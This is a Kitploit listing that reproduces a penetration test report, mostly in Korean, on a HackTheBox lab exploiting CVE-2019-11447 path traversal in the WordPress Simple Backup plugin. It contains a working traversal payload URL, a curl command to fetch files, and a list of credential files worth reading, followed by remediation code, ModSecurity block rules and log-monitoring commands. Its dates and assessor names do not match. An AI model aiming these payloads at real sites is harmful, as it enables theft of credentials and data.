Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
WordPress-Path-Traversal-CVE-2019-11447 — WordPress Simple Backup 플러그인의 인증되지 않은 경로 탐색(CVE-2019-11447)을 시연하는 상세 침투 테스트 보고서로, 악용 단계, 영향 분석 및 수정 지침을 포함합니다. | Kitploit
도구/GitHubGitHub/capivara-research/wordpress-path-traversal-cve-2019-11447
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubcapivara-research/wordpress-path-traversal-cve-2019-11447

WordPress-Path-Traversal-CVE-2019-11447

WordPress Simple Backup 플러그인의 인증되지 않은 경로 탐색(CVE-2019-11447)을 시연하는 상세 침투 테스트 보고서로, 악용 단계, 영향 분석 및 수정 지침을 포함합니다.

저장소 보기
2일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

침투 테스트 보고서

WordPress 경로 탐색 - CVE-2019-11447


문서 정보

항목세부 정보
문서 제목침투 테스트 보고서 - WordPress 경로 탐색
고객/시험HackTheBox 랩 - CPTS 실습 1
날짜2026년 8월 22일
평가자Cyberia (침투 테스터)
평가 유형그레이 박스 (외부, 자격 증명 없음)
랩 환경154.57.164.73:30706
랩 시간1시간
목표제한된 파일을 획득하기 위한 취약점 식별 및 악용
획득한 플래그HTB{my_f1r57_h4ck}

경영진 요약

154.57.164.73:30706에 호스팅된 웹 애플리케이션에 대한 이번 침투 평가에서, 인증되지 않은 공격자가 서버 파일시스템에서 임의의 파일을 다운로드하고 읽을 수 있게 하는 치명적인 취약점이 식별되었습니다.

취약한 WordPress 설치에는 인증이나 권한 부여 없이도 권한 없는 파일 접근을 허용하는 **경로 탐색 취약점(CVE-2019-11447)**이 있는 오래된 플러그인(Simple Backup v2.7.10)이 포함되어 있습니다.

이 취약점은 서버 루트에서 /flag.txt 파일을 획득하는 데 성공적으로 악용되었으며, 이는 기밀성의 완전한 침해를 확인시켜 줍니다. 이러한 접근 권한을 가진 공격자는 다음을 수행할 수 있습니다:

  • 민감한 구성 파일 추출 (wp-config.php, .env)
  • 데이터베이스 자격 증명 및 사용자 데이터 읽기
  • 개인 SSH 키 및 인증 토큰 접근
  • 유출된 자격 증명을 통한 권한 상승 가능성
  • 추가 공격을 위한 개인 정보 수집

이 취약점은 데이터 보안, 개인정보 보호 컴플라이언스(GDPR, HIPAA, PCI-DSS) 및 시스템 무결성에 극심한 위험을 초래하므로 즉시 해결하기 위한 긴급 조치가 필요합니다.


평가 개요

심각도수비즈니스 영향
🔴 치명적1기밀성의 완전한 침해, 권한 없는 파일 접근
🟠 높음0—
🟡 중간0—
🟢 낮음0—
ℹ️ 정보1오래된 소프트웨어 버전 감지

방법론

평가 유형: 그레이 박스 (외부 공격자, 제공된 자격 증명 없음, 네트워크 접근 가능)

평가 날짜: 2026년 8월 22일

테스트 접근 방식: 업계 표준 침투 테스트 프레임워크(PTES)를 따르는 비회피적이고 체계적인 평가:

  1. 정찰 — 수동 정보 수집
  2. 스캐닝 및 열거 — 능동 서비스 탐색
  3. 취약점 분석 — 약점 식별
  4. 악용 — 개념 증명 개발
  5. 사후 악용 — 영향 시연
  6. 보고 — 문서화 및 해결 지침

발견 사항

🔴 치명적 - 경로 탐색 및 임의 파일 다운로드

CVE-2019-11447 | CWE-22: 제한된 디렉터리에 대한 경로명의 부적절한 제한


설명

WordPress 플러그인 Simple Backup(버전 2.7.10/2.7.11, Exploit-DB 39883)의 관리자 "Backup Manager" 페이지에는 경로 탐색 취약점이 존재합니다. 이 플러그인은 download_backup_file GET 매개변수를 통해 제공되는 파일 경로를 검증하지 못하여, 공격자가 상대 경로 시퀀스(../)를 사용하여 의도된 simple-backup/ 디렉터리 외부로 이동하고 웹 서버 프로세스가 읽을 수 있는 모든 파일(파일시스템 루트의 파일 포함)을 다운로드할 수 있게 합니다.

취약한 엔드포인트:``` GET /wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../../../../../../../flag.txt

root@kitploit:~
`page=backup_manager`는 요청을 플러그인의 관리자 페이지 핸들러로 라우팅합니다. `download_backup_file`은 플러그인의 코드가 직접 읽고 검증 없이 파일 시스템 경로에 연결하는 매개변수로, 디렉터리 트래버설을 허용합니다.

---

### CVSS v3.1 점수

**7.5 - 높음** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

- **공격 벡터 (AV):** 네트워크
- **공격 복잡도 (AC):** 낮음
- **필요한 권한 (PR):** 없음
- **사용자 상호작용 (UI):** 없음
- **범위 (S):** 변경되지 않음
- **기밀성 (C):** 높음
- **무결성 (I):** 없음
- **가용성 (A):** 없음

---

### 비즈니스 영향

**기밀성 침해:** ⚠️ 치명적

공격자는 웹 서버에서 접근 가능한 모든 파일을 읽을 수 있으며, 여기에는 다음이 포함됩니다:

| 파일 | 영향 | 위험 수준 |
|------|--------|------------|
| `/wp-config.php` | 데이터베이스 자격 증명, 솔트, 키 | 🔴 치명적 |
| `/.env` | API 키, 비밀값, 구성 | 🔴 치명적 |
| `/etc/passwd` | 사용자 열거, 시스템 매핑 | 🟠 높음 |
| SSH 키 (`.ssh/id_rsa`) | 측면 이동, 시스템 접근 | 🔴 치명적 |
| `/proc/self/environ` | 실행 중인 애플리케이션 비밀값 | 🟠 높음 |
| 사용자 업로드 디렉터리 | 개인 파일, 미디어 | 🟠 높음 |

**규제 영향:**
- **GDPR 위반:** 사용자 데이터에 대한 무단 접근
- **HIPAA 위반:** 보호된 건강 정보 노출
- **PCI-DSS 위반:** 신용카드 데이터 또는 결제 정보 접근
- **SOC 2 위반:** 기밀성 요구사항 위반

---

### 취약한 코드 패턴

Exploit-DB 권고(39883.txt, `searchsploit -x`로 확인 — [ht4-poc.png](https://github.com/capivara-research/wordpress-path-traversal-cve-2019-11447/blob/HEAD/images/ht4-poc.png) 참조)는 `simple-backup-manager.php`의 플러그인 **삭제** 프리미티브를 문서화합니다:```php
if(array_key_exists('delete_backup_file', $_GET)){
    $this->delete_local_backup_file($_GET['delete_backup_file']);
}

(no content provided)```php $bk_dir = ABSPATH."simple-backup/"; unlink($bk_dir . $filename);

root@kitploit:~
`$filename`은 `$_GET['delete_backup_file']`에서 직접 가져오며 `basename()`이나 경로 포함 검사가 전혀 없습니다. `../pizza.txt`를 전달하면 `$bk_dir . $filename`이 `.../simple-backup/../pizza.txt` → `.../pizza.txt`로 해석되어 의도된 백업 폴더를 벗어나게 됩니다.

이번 작업에서 실제로 악용된 **다운로드** 프리미티브(`download_backup_file`)는 동일한 플러그인에서 정확히 동일한 정화되지 않은 연결 패턴을 따르지만, 파일을 삭제하는 대신 요청자에게 다시 제공합니다. 이를 통해 파일시스템 루트(`ABSPATH/simple-backup/`에서 `../` 10회)에서 `/flag.txt`를 검색할 수 있었습니다.

**문제점:**
- 디렉터리 구성 요소를 제거하기 위한 `basename()` 미사용
- 허용된 파일의 화이트리스트 없음
- `realpath()`가 `ABSPATH."simple-backup/"` 내에 유지되는지 검증하지 않음
- 사용자 입력을 파일 경로에 직접 연결
- 파일 제공 전에 `current_user_can()` / 인증 확인이 없음 — 핸들러는 플러그인 로드 시 실행되며, WordPress 자체 `wp-admin` 인증 게이트보다 앞서 실행되므로 **로그인하지 않고도** 접근 가능합니다.

---

### 개념 증명

#### **1단계: 초기 접근 — 애플리케이션 식별**

브라우저(`http://154.57.164.73:30706/`)를 통해 대상에 직접 연결했습니다. WordPress 설치의 제목은 **"GETTING STARTED"**이며, 홈페이지의 공개 블로그 게시물에는 취약한 구성 요소를 식별할 수 있는 정확한 플러그인 이름과 버전이 일반 텍스트로 공개되어 있습니다: **"Simple Backup Plugin 2.7.10 for WordPress"** — 열거 도구 없이도 취약한 구성 요소를 핑거프린팅할 수 있었습니다.

![Initial Access - WordPress 홈페이지에 공개된 플러그인 버전](https://assets.kitploit.com/production/public/readmes/51282/807a6be937aeb55de6f3c60b479762729a056e9134edd0f8bf3a0779b36b854f/46c8a8c16d715251f282bacf2522c3e620864b14008847867c32672ba0d051fd-display-v1.webp)

#### **2단계: 서비스 핑거프린팅**```bash
whatweb http://154.57.164.73:30706/

결과: Apache/2.4.41 (Ubuntu Linux), WordPress 5.6.1이 MetaGenerator 및 WordPress 플러그인 시그니처를 통해 확인되었습니다.

서비스 핑거프린팅 - whatweb 출력

3단계: 취약점 연구```bash

searchsploit simple backup wordpress

root@kitploit:~
**결과:**```
Exploit Title                                              |  Path
------------------------------------------------------------------------------
WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities | php/webapps/39883.txt

취약점 연구 - searchsploit 일치

전체 권고문을 읽어 정확한 취약 매개변수와 코드 경로를 파악합니다:```bash searchsploit -x php/webapps/39883.txt

root@kitploit:~
보고서는 `delete_backup_file` 매개변수를 통한 인증되지 않은 **임의 파일 삭제(Arbitrary File Deletion)** 를 문서화하고 있으며, `simple-backup/` 아래의 백업 파일(그리고 동일한 무결점 코드 경로를 통해 `download_backup_file`을 통한 임의 파일)이 인증 없이 검색될 수 있다고 명시합니다.

![취약점 연구 - searchsploit -x로 읽은 Exploit-DB PoC 39883.txt](https://assets.kitploit.com/production/public/readmes/51282/8d2f7a41935c4f9ebf4df1243ee68ba0628592b26411770696534eaa903851c4/7e636497c5d9d7382c9b0d7d5917938a399cf76f014b6e5fb754400078325e54-display-v1.webp)

#### **4단계: 악용 — `download_backup_file`을 통한 경로 탐색(Path Traversal)**

플러그인의 관리자 페이지 라우팅에서 식별된 취약한 엔드포인트:```
http://154.57.164.73:30706/wp-admin/tools.php?page=backup_manager&download_backup_file=

악용 페이로드 (10× ../로 ABSPATH/simple-backup/에서 파일시스템 루트까지 이동):``` http://154.57.164.73:30706/wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../../../../../../../flag.txt

root@kitploit:~
**GUI(이 평가에서 사용됨):** 페이로드 URL을 브라우저 주소 표시줄에 직접 입력하여 이동했습니다. 로그인은 필요하지 않았습니다 — 브라우저가 확인된 `flag.txt` 파일 다운로드를 자동으로 트리거했습니다.

![Exploitation - 브라우저 주소 표시줄의 경로 탐색 페이로드, flag.txt 다운로드됨](https://assets.kitploit.com/production/public/readmes/51282/c02c8273770253f4f0c3b79c0e4de1ab7b8190bfdbbec554a90a25e22553a635/6d1a521bdea2df6ba65e17df783d9f81ea3da096daba3f9bde02bece60a8e406-display-v1.webp)

**Headless에 해당하는 방식:**```bash
curl -s "http://154.57.164.73:30706/wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../../../../../../../flag.txt" -o flag.txt
cat flag.txt

Flag Obtained: HTB{my_f1r57_h4ck}


Why It Works

The vulnerability succeeds because:

  1. No Input Validation: $_GET['download_backup_file'] is not checked against a whitelist
  2. No Path Canonicalization: realpath() is not used to verify the file stays inside simple-backup/
  3. No Basename Extraction: Directory traversal sequences (../) are not filtered
  4. Direct Concatenation: User input is directly concatenated onto ABSPATH."simple-backup/"
  5. No Authentication: The handler runs on plugin load, before WordPress's wp-admin auth gate — reachable while logged out
  6. No Authorization: No current_user_can() check confirms the requester should access the requested file

Attack Flow:``` User Input: ../../../../../../../../../../flag.txt ↓ No Validation (FAILURE POINT) ↓ Concatenated: ABSPATH/simple-backup/../../../../../../../../../../flag.txt ↓ Resolves to: /flag.txt (accessible!) ↓ Plugin serves file contents with web server permissions ↓ Browser downloads flag.txt to attacker's machine

root@kitploit:~
---

### 영향 검증

✅ **기밀성 손상:** 웹 서버 프로세스가 읽을 수 있는 모든 파일에 접근 가능
✅ **인증 불필요:** 인증되지 않은 사용자도 악용 가능
✅ **사용자 상호작용 불필요:** 직접적인 HTTP 요청으로 악용 가능
✅ **반복 가능 및 신뢰성 확보:** 모든 취약한 버전에서 동작
✅ **중요 비즈니스 데이터 위험:** 구성 파일, 자격 증명, 사용자 데이터 노출

---

## 해결 방법

### **옵션 1: 입력 허용 목록 (권장)**

미리 정의된 파일 목록에서만 다운로드를 허용합니다.```php
<?php
// Define allowed backup files
$allowed_files = array(
    'backup_2024_01_15.zip',
    'backup_2024_01_16.zip',
    'backup_2024_01_17.zip',
);

$requested_file = $_GET['download_backup_file'];

// Validate against whitelist
if (!in_array($requested_file, $allowed_files)) {
    die("File not found or access denied");
}

// Use basename() as double protection
$file = basename($requested_file);
$filepath = ABSPATH . "simple-backup/" . $file;

// Verify file exists and is readable
if (!file_exists($filepath) || !is_readable($filepath)) {
    die("File not found");
}

readfile($filepath);
?>

장점:

  • 가장 안전한 접근 방식
  • 의도된 파일만 허용
  • 경로 탐색 불가능
  • 명확한 감사 추적

옵션 2: realpath()를 사용한 경로 검증

realpath()를 사용하여 경로를 정규화하고 포함 여부를 검증합니다:```php

root@kitploit:~
**장점:**
- 심볼릭 링크와 복잡한 경로를 처리합니다
- 포함 여부를 자동으로 검증합니다
- 화이트리스트보다 더 유연합니다

---

### **옵션 3: 파일 이름만 필요할 때 basename() 사용**

파일 이름 구성 요소만 추출합니다:```php
<?php
$user_input = $_GET['download_backup_file'];

// Remove all directory components
$file = basename($user_input);

// Build safe path
$filepath = ABSPATH . "simple-backup/" . $file;

// Verify file exists
if (!file_exists($filepath)) {
    die("File not found");
}

readfile($filepath);
?>

Advantages:

  • 간단한 구현
  • 모든 경로 탐색 시퀀스 제거
  • 디렉토리 접근 불가

참고: 이 접근 방식은 모든 합법적인 파일이 하위 디렉터리가 없는 단일 디렉터리에 있는 경우에만 작동합니다.


인프라 수준 보호

웹 애플리케이션 방화벽(WAF) 규칙:```

Block path traversal attempts

ModSecurity Rule: SecRule ARGS:download_backup_file "@rx ../" "id:1000,phase:2,block,msg:'Path Traversal Attempt'" SecRule ARGS:download_backup_file "@rx %2e%2e%2f" "id:1001,phase:2,block,msg:'Encoded Path Traversal'"

root@kitploit:~
**파일 시스템 권한:**```bash
# Restrict web server access to necessary directories only
chmod 750 /var/www/html/wp-content/plugins/
chmod 750 /var/www/html/wp-content/simple-backup/

# Remove sensitive files from web root
rm -f /var/www/html/.env
mv /var/www/html/wp-config.php /var/www/wp-config.php

# Use chroot/jailing for web server
# Set PHP open_basedir to restrict file access
php_admin_value[open_basedir] = /var/www/html/uploads

액세스 로깅 및 모니터링:```bash

Monitor for traversal attempts in web logs

tail -f /var/log/apache2/access.log | grep ".." tail -f /var/log/apache2/access.log | grep "%2e%2e"

Alert on suspicious file access patterns

Integration with SIEM (Splunk, ELK, etc.)

root@kitploit:~
**업데이트 관리:**

1. Simple Backup 플러그인 비활성화 또는 제거
2. 승인된 백업 솔루션을 보안 감사와 함께 설치
3. WordPress를 최신 버전으로 업데이트
4. 모든 플러그인을 최신 버전으로 업데이트
5. PHP를 보안 패치가 포함된 8.0+로 업데이트

---

## 공격 체인```
┌─────────────────────────────────────────────────────────────┐
│  1. INITIAL ACCESS                                          │
│  └─ Browse to 154.57.164.73:30706                           │
│  └─ WordPress "GETTING STARTED" site identified              │
│  └─ Homepage blog post discloses: Simple Backup Plugin 2.7.10│
└──────────────────────┬──────────────────────────────────────┘
                       │
┌──────────────────────▼──────────────────────────────────────┐
│  2. ENUMERATION                                             │
│  └─ whatweb confirms Apache 2.4.41, WordPress 5.6.1          │
└──────────────────────┬──────────────────────────────────────┘
                       │
┌──────────────────────▼──────────────────────────────────────┐
│  3. VULNERABILITY RESEARCH                                  │
│  └─ searchsploit → 39883.txt (Simple Backup 2.7.11 vulns)    │
│  └─ searchsploit -x → read PoC, identify unsanitized         │
│     delete_backup_file / download_backup_file parameters     │
└──────────────────────┬──────────────────────────────────────┘
                       │
┌──────────────────────▼──────────────────────────────────────┐
│  4. EXPLOITATION                                             │
│  └─ Endpoint: /wp-admin/tools.php?page=backup_manager        │
│  └─ Payload: download_backup_file=../..(x10)../flag.txt      │
│  └─ Browser navigates to payload URL (no login required)     │
│  └─ Plugin resolves path to /flag.txt and serves it          │
└──────────────────────┬──────────────────────────────────────┘
                       │
┌──────────────────────▼──────────────────────────────────────┐
│  5. SUCCESS                                                 │
│  └─ Flag Retrieved: HTB{my_f1r57_h4ck}                       │
│  └─ Confidentiality Breached                                 │
│  └─ Unauthenticated arbitrary file read confirmed             │
└─────────────────────────────────────────────────────────────┘

결론

발견 요약

WordPress Simple Backup 플러그인에는 인증되지 않은 공격자가 서버에서 임의의 파일을 다운로드하고 읽을 수 있게 하는 치명적인 경로 순회(path traversal) 취약점이 존재합니다. 이 취약점은 웹 루트에서 민감한 파일을 획득하는 데 성공적으로 악용되었습니다.

위험 수준: 🔴 치명적(Critical)

우선 조치 계획

우선순위조치일정담당자
🔴 P0Simple Backup 플러그인 비활성화/제거즉시보안/운영
🔴 P0화이트리스트 기반 파일 검증 구현이번 주개발
🟠 P1경로 순회 차단을 위한 WAF 규칙 배포이번 주운영
🟠 P1서버의 무단 액세스 로그 감사이번 주보안
🟠 P1노출된 모든 자격 증명 교체 (DB, SSH, API)이번 주운영
🟡 P2WordPress 코어 및 모든 플러그인 업데이트이번 주운영
🟡 P2파일 무결성 모니터링 구현다음 스프린트보안
🟡 P2다른 플러그인에 대한 전체 보안 감사 실시다음 스프린트보안

교훈

  1. 타사 플러그인 의존성은 면밀한 검토가 필요하다 — 배포 전에 항상 플러그인을 감사하라
  2. 경로 순회는 치명적인 취약점이다 — 입력 검증이 필수적이다
  3. 심층 방어(Defense in Depth)가 필요하다 — 단일 계층 보안으로는 충분하지 않다
  4. 오래된 소프트웨어는 고위험이다 — 정기적인 업데이트 일정을 유지하라
  5. 의심스러운 패턴을 모니터링하고 경고하라 — 조기 탐지가 확대를 방지한다

스크린샷 및 증거

스크린샷 1: 초기 접근 - 플러그인 버전 노출

WordPress 홈페이지 블로그 게시물 발견 사항: WordPress 사이트 "GETTING STARTED"는 블로그 게시물에서 설치된 플러그인과 버전을 공개적으로 노출합니다 — "Simple Backup Plugin 2.7.10 for WordPress"

스크린샷 2: 서비스 핑거프린팅 - whatweb

whatweb 출력 발견 사항: Apache/2.4.41 (Ubuntu Linux), WordPress 5.6.1 확인됨

스크린샷 3: 취약점 연구 - searchsploit

searchsploit 결과 발견 사항: "WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities" (php/webapps/39883.txt)

스크린샷 4: 취약점 연구 - Exploit-DB PoC 내용

searchsploit -x PoC 읽기 발견 사항: 권고문은 delete_backup_file을 통한 인증되지 않은 임의 파일 삭제를 문서화하며, 동일하게 정화되지 않은 코드 경로가 download_backup_file에도 적용됩니다

스크린샷 5: 악용 - 브라우저를 통한 플래그 획득

브라우저의 경로 순회 페이로드, flag.txt 다운로드됨 발견 사항: tools.php?page=backup_manager&download_backup_file=../../../../../../../../../../flag.txt로 이동하면 인증 없이 flag.txt가 다운로드됩니다: HTB{my_f1r57_h4ck}


참고 자료

취약점 세부 정보

  • CVE-2019-11447 — Simple Backup 경로 순회

    • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11447
  • CWE-22 — 제한된 디렉터리에 대한 경로명의 부적절한 제한('경로 순회')

    • https://cwe.mitre.org/data/definitions/22.html
  • CVSS v3.1 점수: 7.5 (높음)

    • https://www.first.org/cvss/calculator/3.1

보안 자료

  • OWASP Top 10 - A01:2021 깨진 접근 제어(Broken Access Control)

    • https://owasp.org/Top10/A01_2021-Broken_Access_Control/
  • OWASP 경로 순회(Path Traversal)

    • https://owasp.org/www-community/attacks/Path_Traversal
  • PortSwigger Web Security Academy - 경로 순회(Path Traversal)

    • https://portswigger.net/web-security/file-path-traversal

도구 및 기법

  • SearchSploit — Exploit Database 검색

    • https://www.exploit-db.com/
  • NMAP — 네트워크 매퍼

    • https://nmap.org/
  • WhatWeb — 웹 핑거프린팅 도구

    • https://www.morningstarsecurity.com/research/whatweb

수정 조치 참고 자료

  • PHP Security: realpath() — https://www.php.net/manual/en/function.realpath.php
  • PHP Security: basename() — https://www.php.net/manual/en/function.basename.php
  • ModSecurity — 웹 애플리케이션 방화벽 — https://modsecurity.org/

보고서 인증

본 보고서는 적절한 승인을 받고 정의된 범위 내에서 수행된 침투 테스트를 문서화합니다.

항목값
보고서 상태✅ 완료
발견 사항 검증✅ 예
권장 사항 실행 가능✅ 예
기밀성🔒 높음
배포 범위승인된 인원에게만 제한

평가자: Capivara Root (침투 테스터)
날짜: 2026년 8월 11일
서명: 디지털 보고서 - 물리적 서명 필요 없음


© 2026 침투 테스트 평가 | 기밀

도구 다운로드